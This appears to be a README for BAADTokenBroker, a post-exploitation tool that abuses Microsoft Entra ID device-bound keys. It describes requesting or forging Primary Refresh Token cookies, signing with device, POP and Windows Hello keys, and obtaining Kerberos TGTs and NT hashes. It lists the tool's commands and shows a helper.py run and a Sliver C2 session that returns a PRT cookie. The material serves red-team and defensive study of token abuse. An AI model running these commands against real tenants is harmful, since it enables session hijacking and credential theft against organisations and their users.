BAADTokenBroker Abuses Microsoft Entra ID Device-Bound Keys for PRT Hijacking

BAADTokenBroker

BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.

It can:

  • Request the logged-on user’s PRT cookie
  • Create a PRT cookie using supplied credentials
  • Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms

Usage

BAADTokenBroker provides the following commands:

  • info: Retrieve Entra ID information
  • get_token_blob: Dump the cached token (mainly for research purposes; not easy to use in engagements)
  • sign_with_dkpriv: Sign provided data using Entra device key
  • sign_with_popkey: Sign provided data using POP key
  • decrypt_with_popkey: Decrypt provided data using POP key
  • sign_with_userkey: Sign provided data using Windows Hello for Business key
  • request_prt_cookie: Request a PRT Cookie
  • request_sso_tgs: Request a service ticket for Desktop SSO, which you can use with tools such as SeamlessPass

To make the commands easier to use in common scenarios, helper.py generates BAADTokenBroker command lines based on what you want to achieve.

Run helper.py with one of the following options:

  • request_prt_cookie: Generates command lines to request the logged-on user’s PRT cookie
  • create_prt_cookie: Generates command lines to create a PRT cookie using supplied credentials
  • get_tgt: Generates command lines to request a partial TGT and session key via a PRT cookie (patched by Microsoft around April 4th, 2026)
  • get_tgt_with_whfb: Generates command lines to request a partial TGT and session key via Windows Hello for Business
  • get_tgt_with_sso_tgs: Generates command lines to request a partial TGT and session key via a Desktop SSO Kerberos ticket

Here is an example of retrieving a user’s PRT cookie. To generate command lines for Sliver, the -s option is required.

    $ python3 helper.py -s request_prt_cookie
    [*] execute BAADTokenBroker as follows:
    BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA

Execute the command lines as follows:

    [localhost] sliver (_) > BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA

      -arg2:<empty> (default)
      -arg3:<empty> (default)
      -arg4:<empty> (default)
    [*] Successfully executed BAADTokenBroker (coff-loader)
    [*] Got output:
    [*] requesting PRT Cookie…
    [+] request_prt_cookie success!

    eyJhbGciOiJIUzI1NiIsICJrZGZfd…(omitted)

Install
